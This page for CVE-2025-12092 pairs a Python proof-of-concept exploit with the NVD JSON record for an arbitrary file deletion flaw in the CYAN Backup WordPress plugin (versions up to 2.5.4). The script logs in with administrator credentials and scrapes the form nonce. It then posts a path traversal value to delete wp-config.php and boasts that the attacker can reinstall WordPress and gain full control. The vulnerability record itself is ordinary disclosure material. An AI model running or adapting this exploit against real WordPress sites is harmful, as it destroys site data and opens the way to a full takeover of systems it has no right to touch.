CVE-2025-12092

import requests import re # CVE-2025-12092 PoC - CYAN Backup Arbitrary File Deletion # Target: WordPress site with CYAN Backup plugin <= 2.5.4 # Authentication: Administrator privileges required target_url = "http://target-wordpress-site.com" username = "admin" password = "password" session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{target_url}/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) # Step 2: Access CYAN Backup plugin page backup_page_url = f"{target_url}/wp-admin/admin.php?page=cyan-backup" response = session.get(backup_page_url) # Step 3: Extract nonce for backup deletion # In real attack, attacker would intercept the request and modify the file path nonce_pattern = r'name="_wpnonce" value="([a-z0-9]+)"' nonce = re.search(nonce_pattern, response.text).group(1) # Step 4: Delete arbitrary file (e.g., wp-config.php) # Using path traversal to target wp-config.php delete_url = f"{target_url}/wp-admin/admin.php?page=cyan-backup" target_file = "../../../../wp-config.php" # Path traversal attack delete_data = { "_wpnonce": nonce, "action": "delete", "file": target_file, "_wp_http_referer": backup_page_url } # Send malicious deletion request result = session.post(delete_url, data=delete_data) if "deleted" in result.text.lower() or result.status_code == 200: print("[+] wp-config.php has been deleted successfully") print("[+] Attacker can now reinstall WordPress and gain full control") else: print("[-] Exploitation failed - file may not exist or access denied")

{"cve": {"id": "CVE-2025-12092", "sourceIdentifier": "[email protected]", "published": "2025-11-08T10:15:41.143", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CYAN Backup plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete' functionality in all versions up to, and including, 2.5.4. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/toolstack/cyan-backup/commit/4a79d23e8ba330b5cb655a083c6a00ef32a7b249", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3390065/cyan-backup/tags/2.5.5/includes/page-backups.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/39972b06-920f-48b0-aa36-bb5caab87cb6?source=cve", "source": "[email protected]"}]}}